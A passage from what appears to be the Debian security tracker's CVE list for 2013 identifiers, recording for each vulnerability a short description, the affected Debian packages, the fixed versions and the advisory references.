7600 rout ...) NOT-FOR-US: Cisco CVE-2013-6692 (Cisco IOS XE 3.8S(.2) and earlier does not properly use a DHCP pool du ...) NOT-FOR-US: Cisco CVE-2013-6691 (The WebVPN CIFS implementation in Cisco Adaptive Security Appliance (A ...) NOT-FOR-US: Cisco ASA CVE-2013-6690 (Multiple cross-site scripting (XSS) vulnerabilities in the web interfa ...) NOT-FOR-US: Cisco CVE-2013-6689 (Cisco Unified Communications Manager (Unified CM) 9.1(1) and earlier a ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-6688 (Directory traversal vulnerability in the license-upload interface in t ...) NOT-FOR-US: Cisco Unified Communications Manager CVE-2013-6687 (The web portal in the Enterprise License Manager component in Cisco We ...) NOT-FOR-US: Cisco WebEx Meetings Server CVE-2013-6686 (The SSL VPN implementation in Cisco IOS 15.3(1)T2 and earlier allows r ...) NOT-FOR-US: Cisco IOS CVE-2013-6685 (The firmware on Cisco Unified IP phones 8961, 9951, and 9971 uses weak ...) NOT-FOR-US: Cisco Unified IP phones CVE-2013-6684 (The web framework on Cisco Wireless LAN Controller (WLC) devices does ...) NOT-FOR-US: Cisco Wireless LAN Controller CVE-2013-6683 (The IPv6 implementation in Cisco NX-OS does not properly handle neighb ...) NOT-FOR-US: Cisco NX-OS CVE-2013-6682 (The phone-proxy implementation in Cisco Adaptive Security Appliance (A ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2013-6681 (Tube Map Live Underground for Android before 3.0.22 has an Information ...) NOT-FOR-US: Tube Map Live Underground for Android CVE-2013-6680 REJECTED CVE-2013-6679 REJECTED CVE-2013-6678 REJECTED CVE-2013-6677 REJECTED CVE-2013-6676 REJECTED CVE-2013-6675 REJECTED CVE-2013-6674 (Cross-site scripting (XSS) vulnerability in Mozilla Thunderbird 17.x t ...) - icedove 24.2.0-1 [squeeze] - icedove NOTE: http://www.mozilla.org/security/announce/2014/mfsa2014-14.html CVE-2013-6673 (Mozilla Firefox before 26.0, Firefox ESR 24.x before 24.2, Thunderbird ...) - iceweasel 24.2.0esr-1 [squeeze] - iceweasel - icedove 24.2.0-1 [squeeze] - icedove - iceape [wheezy] - iceape [squeeze] - iceape CVE-2013-6672 (Mozilla Firefox before 26.0 and SeaMonkey before 2.23 on Linux allow u ...) - iceweasel (Only affects Firefox 25) - iceape (Only affects Firefox 25) CVE-2013-6671 (The nsGfxScrollFrameInner::IsLTR function in Mozilla Firefox before 26 ...) - iceweasel 24.2.0esr-1 - icedove 24.2.0-1 - iceape [squeeze] - iceweasel [squeeze] - icedove [wheezy] - iceape [squeeze] - iceape CVE-2013-6670 RESERVED CVE-2013-6669 RESERVED CVE-2013-6668 (Multiple unspecified vulnerabilities in Google V8 before 3.24.35.10, a ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-6667 (Multiple unspecified vulnerabilities in Google Chrome before 33.0.1750 ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6666 (The PepperFlashRendererHost::OnNavigate function in renderer/pepper/pe ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6665 (Heap-based buffer overflow in the ResourceProvider::InitializeSoftware ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6664 (Use-after-free vulnerability in the FormAssociatedElement::formRemoved ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6663 (Use-after-free vulnerability in the SVGImage::setContainerSize functio ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6662 (Google Chrome caches TLS sessions before certificate validation occurs ...) NOTE: Chrome issue fixed end of 2013, not really worth figuring out in which version CVE-2013-6661 (Multiple unspecified vulnerabilities in Google Chrome before 33.0.1750 ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6660 (The drag-and-drop implementation in Google Chrome before 33.0.1750.117 ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6659 (The SSLClientSocketNSS::Core::OwnAuthCertHandler function in net/socke ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6658 (Multiple use-after-free vulnerabilities in the layout implementation i ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6657 (core/html/parser/XSSAuditor.cpp in the XSS auditor in Blink, as used i ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6656 (The XSSAuditor::init function in core/html/parser/XSSAuditor.cpp in th ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6655 (Use-after-free vulnerability in Blink, as used in Google Chrome before ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6654 (The SVGAnimateElement::calculateAnimatedValue function in core/svg/SVG ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6653 (Use-after-free vulnerability in the web contents implementation in Goo ...) {DSA-2883-1} - chromium-browser 33.0.1750.152-1 [squeeze] - chromium-browser CVE-2013-6652 (Directory traversal vulnerability in sandbox/win/src/named_pipe_dispat ...) - chromium-browser (Windows-specific) CVE-2013-6651 RESERVED CVE-2013-6650 (The StoreBuffer::ExemptPopularPages function in store-buffer.cc in Goo ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-6649 (Use-after-free vulnerability in the RenderSVGImage::paint function in ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) NOTE: libv8 not covered by security support CVE-2013-6648 (SkRegion::setPath in Skia allows remote attackers to cause a denial of ...) - skia (bug #818180) CVE-2013-6647 (A use-after-free in AnimationController::endAnimationUpdate in Google ...) - chromium-browser (According to upstream bug only affected interim version, not a stable release) CVE-2013-6646 (Use-after-free vulnerability in the Web Workers implementation in Goog ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser CVE-2013-6645 (Use-after-free vulnerability in the OnWindowRemovingFromRootWindow fun ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser CVE-2013-6644 (Multiple unspecified vulnerabilities in Google Chrome before 32.0.1700 ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser CVE-2013-6643 (The OneClickSigninBubbleView::WindowClosing function in browser/ui/vie ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser CVE-2013-6642 (Google Chrome through 32.0.1700.23 on Android allows remote attackers ...) - chromium-browser (only affects google chrome on android) CVE-2013-6641 (Use-after-free vulnerability in the FormAssociatedElement::formRemoved ...) {DSA-2862-1} - chromium-browser 32.0.1700.123-1 [squeeze] - chromium-browser CVE-2013-6640 (The DehoistArrayIndex function in hydrogen-dehoist.cc (aka hydrogen.cc ...) {DSA-2811-1} - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 3.14.5.8-5 - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser CVE-2013-6639 (The DehoistArrayIndex function in hydrogen-dehoist.cc (aka hydrogen.cc ...) {DSA-2811-1} - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 3.14.5.8-5 - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser CVE-2013-6638 (Multiple buffer overflows in runtime.cc in Google V8 before 3.22.24.7, ...) {DSA-2811-1} - libv8 [wheezy] - libv8 (Minor issue, Chromium in Wheezy uses its own fixed copy) [squeeze] - libv8 (Unsupported in squeeze-lts) - libv8-3.14 (unimportant; bug #773671) - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser NOTE: libv8 not covered by security support CVE-2013-6637 (Multiple unspecified vulnerabilities in Google Chrome before 31.0.1650 ...) {DSA-2811-1} - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser CVE-2013-6636 (The FrameLoader::notifyIfInitialDocumentAccessed function in core/load ...) {DSA-2811-1} - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser CVE-2013-6635 (Use-after-free vulnerability in the editing implementation in Blink, a ...) {DSA-2811-1} - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser CVE-2013-6634 (The OneClickSigninHelper::ShowInfoBarIfPossible function in browser/ui ...) {DSA-2811-1} - chromium-browser 31.0.1650.63-1 [squeeze] - chromium-browser CVE-2013-6633 RESERVED CVE-2013-6620 RESERVED CVE-2013-6619 RESERVED CVE-2013-6618 (jsdm/ajax/port.php in J-Web in Juniper Junos before 10.4R13, 11.4 befo ...) NOT-FOR-US: Juniper Junos CVE-2013-6617 (The salt master in Salt (aka SaltStack) 0.11.0 through 0.17.0 does not ...) - salt 0.17.1+dfsg-1 CVE-2013-6766 (OpenVAS Administrator 1.2 before 1.2.2 and 1.3 before 1.3.2 allows rem ...) NOT-FOR-US: OpenVAS Administrator (only uploaded to exp 2.5 years ago) CVE-2013-6765 (OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote at ...) NOT-FOR-US: OpenVAS Manager (only uploaded to experimental 2.5 years ago) CVE-2013-6632 (Integer overflow in Google Chrome before 31.0.1650.57 allows remote at ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6631 (Use-after-free vulnerability in the Channel::SendRTCPPacket function i ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6630 (The get_dht function in jdmarker.c in libjpeg-turbo through 1.3.0, as ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser - libjpeg-turbo 1.3.0-3 (low; bug #729873) - libjpeg6b 6b1-4 (low; bug #729867) [squeeze] - libjpeg6b (Minor issue) [wheezy] - libjpeg6b 6b1-3+deb7u1 - libjpeg8 8d-2 (low; bug #729867) [squeeze] - libjpeg8 (Minor issue) [wheezy] - libjpeg8 8d-1+deb7u1 - iceweasel 24.2.0esr-1 [squeeze] - iceweasel - icedove 24.2.0-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape NOTE: http://packetstormsecurity.com/files/123989/IJG-jpeg6b-libjpeg-turbo-Uninitialized-Memory.html CVE-2013-6629 (The get_sos function in jdmarker.c in (1) libjpeg 6b and (2) libjpeg-t ...) {DSA-2923-1 DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser - libjpeg-turbo 1.3.0-3 (low; bug #729873) - libjpeg6b 6b1-4 (low; bug #729867) [wheezy] - libjpeg6b 6b1-3+deb7u1 [squeeze] - libjpeg6b (Minor issue) - libjpeg8 8d-2 (low; bug #729867) [squeeze] - libjpeg8 (Minor issue) [wheezy] - libjpeg8 8d-1+deb7u1 - iceweasel 24.2.0esr-1 [squeeze] - iceweasel - icedove 24.2.0-1 [squeeze] - icedove - iceape [squeeze] - iceape [wheezy] - iceape NOTE: http://packetstormsecurity.com/files/123989/IJG-jpeg6b-libjpeg-turbo-Uninitialized-Memory.html CVE-2013-6628 (net/socket/ssl_client_socket_nss.cc in the TLS implementation in Googl ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6627 (net/http/http_stream_parser.cc in Google Chrome before 31.0.1650.48 do ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6626 (The WebContentsImpl::AttachInterstitialPage function in content/browse ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6625 (Use-after-free vulnerability in core/dom/ContainerNode.cpp in Blink, a ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6624 (Use-after-free vulnerability in Google Chrome before 31.0.1650.48 allo ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6623 (The SVG implementation in Blink, as used in Google Chrome before 31.0. ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6622 (Use-after-free vulnerability in the HTMLMediaElement::didMoveToNewDocu ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6621 (Use-after-free vulnerability in Google Chrome before 31.0.1650.48 allo ...) {DSA-2799-1} - chromium-browser 31.0.1650.57-1 [squeeze] - chromium-browser CVE-2013-6616 REJECTED CVE-2013-6615 REJECTED CVE-2013-6614 REJECTED CVE-2013-6613 REJECTED CVE-2013-6612 REJECTED CVE-2013-6611 REJECTED CVE-2013-6610 REJECTED CVE-2013-6609 REJECTED CVE-2013-6608 REJECTED CVE-2013-6607 REJECTED CVE-2013-6606 REJECTED CVE-2013-6605 REJECTED CVE-2013-6604 REJECTED CVE-2013-6603 REJECTED CVE-2013-6602 REJECTED CVE-2013-6601 REJECTED CVE-2013-6600 REJECTED CVE-2013-6599 REJECTED CVE-2013-6598 REJECTED CVE-2013-6597 REJECTED CVE-2013-6596 REJECTED CVE-2013-6595 REJECTED CVE-2013-6594 REJECTED CVE-2013-6593 REJECTED CVE-2013-6592 REJECTED CVE-2013-6591 REJECTED CVE-2013-6590 REJECTED CVE-2013-6589 REJECTED CVE-2013-6588 REJECTED CVE-2013-6587 REJECTED CVE-2013-6586 REJECTED CVE-2013-6585 REJECTED CVE-2013-6584 REJECTED CVE-2013-6583 REJECTED CVE-2013-6582 REJECTED CVE-2013-6581 REJECTED CVE-2013-6580 REJECTED CVE-2013-6579 REJECTED CVE-2013-6578 REJECTED CVE-2013-6577 REJECTED CVE-2013-6576 REJECTED CVE-2013-6575 REJECTED CVE-2013-6574 REJECTED CVE-2013-6573 REJECTED CVE-2013-6572 REJECTED CVE-2013-6571 REJECTED CVE-2013-6570 REJECTED CVE-2013-6569 REJECTED CVE-2013-6568 REJECTED CVE-2013-6567 REJECTED CVE-2013-6566 REJECTED CVE-2013-6565 REJECTED CVE-2013-6564 REJECTED CVE-2013-6563 REJECTED CVE-2013-6562 REJECTED CVE-2013-6561 REJECTED CVE-2013-6560 REJECTED CVE-2013-6559 REJECTED CVE-2013-6558 REJECTED CVE-2013-6557 REJECTED CVE-2013-6556 REJECTED CVE-2013-6555 REJECTED CVE-2013-6554 REJECTED CVE-2013-6553 REJECTED CVE-2013-6552 REJECTED CVE-2013-6551 REJECTED CVE-2013-6550 REJECTED CVE-2013-6549 REJECTED CVE-2013-6548 REJECTED CVE-2013-6547 REJECTED CVE-2013-6546 REJECTED CVE-2013-6545 REJECTED CVE-2013-6544 REJECTED CVE-2013-6543 REJECTED CVE-2013-6542 REJECTED CVE-2013-6541 REJECTED CVE-2013-6540 REJECTED CVE-2013-6539 REJECTED CVE-2013-6538 REJECTED CVE-2013-6537 REJECTED CVE-2013-6536 REJECTED CVE-2013-6535 REJECTED CVE-2013-6534 REJECTED CVE-2013-6533 REJECTED CVE-2013-6532 REJECTED CVE-2013-6531 REJECTED CVE-2013-6530 REJECTED CVE-2013-6529 REJECTED CVE-2013-6528 REJECTED CVE-2013-6527 REJECTED CVE-2013-6526 REJECTED CVE-2013-6525 REJECTED CVE-2013-6524 REJECTED CVE-2013-6523 REJECTED CVE-2013-6522 REJECTED CVE-2013-6521 REJECTED CVE-2013-6520 REJECTED CVE-2013-6519 REJECTED CVE-2013-6518 REJECTED CVE-2013-6517 REJECTED CVE-2013-6516 REJECTED CVE-2013-6515 REJECTED CVE-2013-6514 REJECTED CVE-2013-6513 REJECTED CVE-2013-6512 REJECTED CVE-2013-6511 REJECTED CVE-2013-6510 REJECTED CVE-2013-6509 REJECTED CVE-2013-6508 REJECTED CVE-2013-6507 REJECTED CVE-2013-6506 REJECTED CVE-2013-6505 REJECTED CVE-2013-6504 REJECTED CVE-2013-6503 REJECTED CVE-2013-6502 REJECTED CVE-2013-6501 (The default soap.wsdl_cache_dir setting in (1) php.ini-production and ...) - php5 (unimportant) NOTE: Rendererd unexpoitable by kernel level hardening for tmp races CVE-2013-6500 REJECTED CVE-2013-6499 REJECTED CVE-2013-6498 RESERVED CVE-2013-6497 (clamscan in ClamAV before 0.98.5, when using -a option, allows remote ...) {DLA-95-1} - clamav 0.98.5+dfsg-1 [wheezy] - clamav 0.98.5+dfsg-0+deb7u1 NOTE: https://bugzilla.clamav.net/show_bug.cgi?id=11088 CVE-2013-6496 (Red Hat Conga 0.12.2 allows remote attackers to obtain sensitive infor ...) NOT-FOR-US: Red Hat Conga CVE-2013-6495 (JBossWeb Bayeux has reflected XSS ...) NOT-FOR-US: JBossWeb Bayeux CVE-2013-6494 (fedup 0.9.0 in Fedora 19, 20, and 21 uses a temporary directory with a ...) NOT-FOR-US: fedup (Fedora specific) CVE-2013-6493 (The LiveConnect implementation in plugin/icedteanp/IcedTeaNPPlugin.cc ...) - icedtea-web 1.4.2-1 (low) [wheezy] - icedtea-web (Minor issue) CVE-2013-6492 (The Piranha Configuration Tool in Piranha 0.8.6 does not properly rest ...) NOT-FOR-US: Pirhana CVE-2013-6491 (The python-qpid client (common/rpc/impl_qpid.py) in OpenStack Oslo bef ...) - nova 2013.2.3-1 [wheezy] - nova (Minor issue) CVE-2013-6490 (The SIMPLE protocol functionality in Pidgin before 2.10.8 allows remot ...) {DSA-2859-2 DSA-2859-1} - pidgin 2.10.8-1 CVE-2013-6489 (Integer signedness error in the MXit functionality in Pidgin before 2. ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-6488 REJECTED CVE-2013-6487 (Integer overflow in libpurple/protocols/gg/lib/http.c in the Gadu-Gadu ...) {DSA-2859-1 DSA-2852-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) - libgadu 1:1.11.3-1 CVE-2013-6486 (gtkutils.c in Pidgin before 2.10.8 on Windows allows user-assisted rem ...) - pidgin (Windows-specific) CVE-2013-6485 (Buffer overflow in util.c in libpurple in Pidgin before 2.10.8 allows ...) {DSA-2859-2 DSA-2859-1} - pidgin 2.10.8-1 CVE-2013-6484 (The STUN protocol implementation in libpurple in Pidgin before 2.10.8 ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-6483 (The XMPP protocol plugin in libpurple in Pidgin before 2.10.8 does not ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Not suitable for code injection) CVE-2013-6482 (Pidgin before 2.10.8 allows remote MSN servers to cause a denial of se ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-6481 (libpurple/protocols/yahoo/libymsg.c in Pidgin before 2.10.8 allows rem ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-6480 (Libcloud 0.12.3 through 0.13.2 does not set the scrub_data parameter f ...) - libcloud (affects 0.12.3 to 0.13.3) NOTE: version prior to 0.12.3 don't include a DigitalOcean driver CVE-2013-6479 (util.c in libpurple in Pidgin before 2.10.8 does not properly allocate ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Not suitable for code injection) CVE-2013-6478 (gtkimhtml.c in Pidgin before 2.10.8 does not properly interact with un ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Support in oldstable is limited to IRC, Jabber/XMPP, Sametime and SIMPLE) CVE-2013-6477 (Multiple integer signedness errors in libpurple in Pidgin before 2.10. ...) {DSA-2859-1} - pidgin 2.10.8-1 [squeeze] - pidgin (Not suitable for code injection) CVE-2013-6476 (The OPVPWrapper::loadDriver function in oprs/OPVPWrapper.cxx in the pd ...) {DSA-2876-1 DSA-2875-1} - cups-filters 1.0.47-1 (bug #741318) - cups 1.5.0-16 (bug #741333) NOTE: cups moved filters to separate package in 1.5.0-16 NOTE: in oldstable present in debian/local/filters/pdf-filters/pdftoopvp NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176 CVE-2013-6475 (Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPS ...) {DSA-2876-1 DSA-2875-1} - cups-filters 1.0.47-1 (bug #741318) - cups 1.5.0-16 (bug #741333) NOTE: cups moved filters to separate package in 1.5.0-16 NOTE: in oldstable present in debian/local/filters/pdf-filters/pdftoopvp NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176 CVE-2013-6474 (Heap-based buffer overflow in the pdftoopvp filter in CUPS and cups-fi ...) {DSA-2876-1 DSA-2875-1} - cups-filters 1.0.47-1 (bug #741318) - cups 1.5.0-16 (bug #741333) NOTE: cups moved filters to separate package in 1.5.0-16 NOTE: in oldstable present in debian/local/filters/pdf-filters/pdftoopvp NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7176 CVE-2013-6473 (Multiple heap-based buffer overflows in the urftopdf filter in cups-fi ...) - cups-filters 1.0.47-1 (bug #741318) [wheezy] - cups-filters (does not contain urftopdf filter) NOTE: http://bzr.linuxfoundation.org/loggerhead/openprinting/cups-filters/revision/7175 CVE-2013-6472 (MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 ...) {DSA-2891-1} - mediawiki 1:1.19.10+dfsg-1 [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58699 CVE-2013-6471 RESERVED CVE-2013-6470 (The default configuration in the standalone controller quickstack mani ...) NOT-FOR-US: openstack foreman-installer CVE-2013-6469 (JBoss Overlord Run Time Governance (RTGov) 1.0 for JBossAS allows remo ...) NOT-FOR-US: JBoss SOA RTgov CVE-2013-6468 (JBoss Drools, Red Hat JBoss BRMS before 6.0.1, and Red Hat JBoss BPM S ...) NOT-FOR-US: JBoss Drolls CVE-2013-6467 (Libreswan 3.7 and earlier allows remote attackers to cause a denial of ...) - libreswan (Fixed before the initial upload to Debian) NOTE: https://libreswan.org/security/CVE-2013-6467/CVE-2013-6467.txt CVE-2013-6466 (Openswan 2.6.39 and earlier allows remote attackers to cause a denial ...) {DSA-2893-1} - openswan (bug #737406) NOTE: https://libreswan.org/security/CVE-2013-6467/CVE-2013-6467.txt CVE-2013-6465 (Multiple cross-site scripting (XSS) vulnerabilities in JBPM KIE Workbe ...) NOT-FOR-US: JBPM KIE Workbench CVE-2013-6464 RESERVED CVE-2013-6463 REJECTED CVE-2013-6462 (Stack-based buffer overflow in the bdfReadCharacters function in bitma ...) {DSA-2838-1} - libxfont 1:1.4.7-1 CVE-2013-6461 (Nokogiri gem 1.5.x and 1.6.x has DoS while parsing XML entities by fai ...) - ruby-nokogiri (jruby implementation not shiped) - libnokogiri-ruby (1.4 and earlier not affected) NOTE: https://groups.google.com/forum/#!topic/ruby-security-ann/DeJpjTAg1FA CVE-2013-6460 (Nokogiri gem 1.5.x has Denial of Service via infinite loop when parsin ...) - ruby-nokogiri (jruby implementation not shiped) - libnokogiri-ruby (1.4 and earlier not affected) NOTE: https://groups.google.com/forum/#!topic/ruby-security-ann/DeJpjTAg1FA CVE-2013-6459 (Cross-site scripting (XSS) vulnerability in the will_paginate gem befo ...) - ruby-will-paginate 3.0.5-1 (low; bug #733209) [wheezy] - ruby-will-paginate (Minor issue) - libwill-paginate-ruby [squeeze] - libwill-paginate-ruby (Minor issue) NOTE: https://github.com/mislav/will_paginate/releases/tag/v3.0.5 CVE-2013-6458 (Multiple race conditions in the (1) virDomainBlockStats, (2) virDomain ...) {DSA-2846-1} - libvirt 1.2.1-1 (bug #734556) [squeeze] - libvirt (Unsupported in squeeze-lts) NOTE: https://www.redhat.com/archives/libvir-list/2013-December/msg01202.html NOTE: upstream fix: http://libvirt.org/git/?p=libvirt.git;a=commit;h=db86da5ca2109e4006c286a09b6c75bfe10676ad CVE-2013-6457 (The libxlDomainGetNumaParameters function in the libxl driver (libxl/l ...) - libvirt 1.2.1-1 [wheezy] - libvirt (Vulnerable code not present) [squeeze] - libvirt (Vulnerable code not present) NOTE: https://www.redhat.com/archives/libvir-list/2013-December/msg01258.html NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=f9ee91d35510ccbc6fc42cef8864b291b2d220f4 NOTE: Introduced in http://libvirt.org/git/?p=libvirt.git;a=commit;h=261c4f5fb93c5e23b8002f2760d4a7937cdb7f63 CVE-2013-6456 (The LXC driver (lxc/lxc_driver.c) in libvirt 1.0.1 through 1.2.1 allow ...) - libvirt 1.2.3-1 (bug #732394) [wheezy] - libvirt (Vulnerable code not present, introduced in v1.0.1) [squeeze] - libvirt (Vulnerable code not present, introduced in v1.0.1) CVE-2013-6455 (The CentralAuth extension for MediaWiki before 1.19.10, 1.2x before 1. ...) NOT-FOR-US: Mediawiki CentralAuth extension CVE-2013-6454 (Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, ...) {DSA-2891-1} - mediawiki 1:1.19.10+dfsg-1 [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58472 CVE-2013-6453 (MediaWiki before 1.19.10, 1.2x before 1.21.4, and 1.22.x before 1.22.1 ...) {DSA-2891-1} - mediawiki 1:1.19.10+dfsg-1 [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58553 CVE-2013-6452 (Cross-site scripting (XSS) vulnerability in MediaWiki before 1.19.10, ...) {DSA-2891-1} - mediawiki 1:1.19.10+dfsg-1 [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=57550 CVE-2013-6451 (Cross-site scripting (XSS) vulnerability in MediaWiki 1.19.9 before 1. ...) - mediawiki 1:1.19.10+dfsg-1 [squeeze] - mediawiki NOTE: https://bugzilla.wikimedia.org/show_bug.cgi?id=58088 NOTE: Introduced by the fix for CVE-2013-4568 CVE-2013-6450 (The DTLS retransmission implementation in OpenSSL 1.0.0 before 1.0.0l ...) {DSA-2833-1} - openssl 1.0.1e-5 (low) [squeeze] - openssl (Versions earlier than 1.0.0 are not affected) CVE-2013-6449 (The ssl_get_algorithm2 function in ssl/s3_lib.c in OpenSSL before 1.0. ...) {DSA-2833-1} - openssl 1.0.1e-5 (bug #732754) [squeeze] - openssl (TLS 1.2 support introduced in 1.0.1) NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=1045363 NOTE: http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=ca98926 NOTE: http://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0294b2b CVE-2013-6448 (The InterfaceGenerator handler in JBoss Seam Remoting in JBoss Seam 2 ...) NOT-FOR-US: JBoss Seam CVE-2013-6447 (Multiple XML External Entity (XXE) vulnerabilities in the (1) Executio ...) NOT-FOR-US: JBoss Seam CVE-2013-6446 (The JobHistory Server in Cloudera CDH 4.x before 4.6.0 and 5.x before ...) NOT-FOR-US: Cloudera CVE-2013-6445 (Cumin (aka MRG Management Console), as used in Red Hat Enterprise MRG ...) NOT-FOR-US: Cumin CVE-2013-6444 (PyWBEM 0.7 and earlier does not verify that the server hostname matche ...) - pywbem 0.8.0~dev650-1 (bug #732594) [squeeze] - pywbem (Minor issue) [wheezy] - pywbem (Minor issue) NOTE: Fix: https://bugzilla.redhat.com/attachment.cgi?id=851357 CVE-2013-6443 (CloudForms 3.0 Management Engine before 5.2.1.6 allows remote attacker ...) NOT-FOR-US: RedHat CloudForms Management Engine CVE-2013-6442 (The owner_set function in smbcacls.c in smbcacls in Samba 4.0.x before ...) - samba 2:4.1.6+dfsg-1 (low) [squeeze] - samba (Only affects 4.x and later) [wheezy] - samba (Only affects 4.x and later) - samba4 [wheezy] - samba4 4.0.0~beta2+dfsg1-3.2+deb7u1 NOTE: http://www.samba.org/samba/security/CVE-2013-6442 CVE-2013-6441 (The lxc-sshd template (templates/lxc-sshd.in) in LXC before 1.0.0.beta ...) {DLA-442-1} - lxc 1.0.0-1 (unimportant) NOTE: getting root on host, if not using unprivileged containers or NOTE: restricting the containers with apparmor or selinux. NOTE: CVE is kept as no official documentation explicitly document this fact NOTE: https://github.com/lxc/lxc/commit/f4d5cc8e1f39d132b61e110674528cac727ae0e2 (lxc-1.0.0.beta2) CVE-2013-6440 (The (1) BasicParserPool, (2) StaticBasicParserPool, (3) XML Decrypter, ...) - opensaml2 (Debian provides the C-based Shibboleth implementation) NOTE: http://shibboleth.net/community/advisories/secadv_20131213.txt NOTE: http://blog.sendsafely.com/post/69590974866/web-based-single-sign-on-and-the-dangers-of-saml-xml 